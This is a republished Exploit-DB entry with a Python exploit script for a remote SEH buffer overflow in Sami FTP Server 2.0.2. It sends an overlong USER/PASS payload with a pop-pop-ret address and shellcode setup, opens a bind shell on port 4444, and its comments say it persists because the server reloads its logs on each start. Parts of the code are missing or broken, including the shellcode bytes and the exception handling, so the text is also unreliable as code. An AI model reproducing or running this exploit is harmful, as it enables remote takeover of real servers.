KarjaSoft Sami FTP Server 2.0.2 – USER/PASS Remote Buffer Overflow (SEH)

  • 作者: n30m1nd
    日期: 2016-11-01
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/40675/
  • #/usr/bin/python
    #-*- Coding: utf-8 -*-
    ### Sami FTP Server 2.0.2- SEH Overwrite, Buffer Overflow by n30m1nd ### 
    # Date: 2016-01-11
    # Exploit Author: n30m1nd
    # Vendor Homepage: http://www.karjasoft.com/
    # Software Link: http://www.karjasoft.com/files/samiftp/samiftpd_install.exe
    # Version: 2.0.2
    # Tested on: Win7 64bit and Win10 64 bit
    # Credits
    # =======
    # Thanks to PHRACK for maintaining all the articles up for so much time... 
    # These are priceless and still current for exploit development!!
    # Shouts to the crew at Offensive Security for their huge efforts on making	the infosec community better
    # How to
    # ======
    # * Open Sami FTP Server and open its graphical interface
    # * Run this python script and write the IP to attack
    # * Connect to the same IP on port 4444
    # BONUS
    # =====
    # Since the program will write the data into its (SamiFTP.binlog) logs it will try to load these logs on each
    # start and so, it will crash and run our shellcode everytime it starts.
    # Why?
    # ====
    # The graphical interface tries to show the user name which produces an overflow overwriting SEH
    # Exploit code
    # ============
    import socket
    import struct
    def doHavoc(ipaddr):
    # Bad chars: 00 0d 0a ff
    alignment = "\x90"*3
    jmpfront = "345A7504".decode('hex')
    #CPU Disasm
    #Hex dumpCommand 
    #34 5A XOR AL,5A
    #75 04 JNE SHORT +04
    # pop pop ret in tmp01.dll
    popret = 0x10022ADE
    # fstenv trick to get eip: phrack number 62
    # and store it into EAX for the metasploit shell (BufferRegister)
    getEIPinEAX = "D9EED934E48B44E40C040b".decode('hex')
    #CPU Disasm
    #Hex dumpCommand
    #D934E4FSTENV SS:[ESP]
    #04 0B ADD AL,0B
    # Bind shellcode on port 4444 - alpha mixed BufferRegister=EAX
    shellcode = (
    getEIPinEAX + 
    # Final payload, SEH overwrite ocurrs at 600 bytes
    payload = alignment + "."*(600-len(alignment)-len(jmpfront)) + jmpfront + struct.pack("<L", popret) + shellcode
    s = socket.create_connection((ipaddr, 21))
    s.send("USER "+ payload +"\r\n" )
    print s.recv(4096)
    s.send("PASS "+ payload +"\r\n" )
    print s.recv(4096)
    print s.recv(4096)
    except e:
    print str(e)
    exit("[+] Couldn't connect")
    if __name__ == "__main__":
    ipaddr = raw_input("[+] IP: ")
    while raw_input("[?] Got shell?(y/n) ").lower() == "n":
    print "[+] Enjoy..."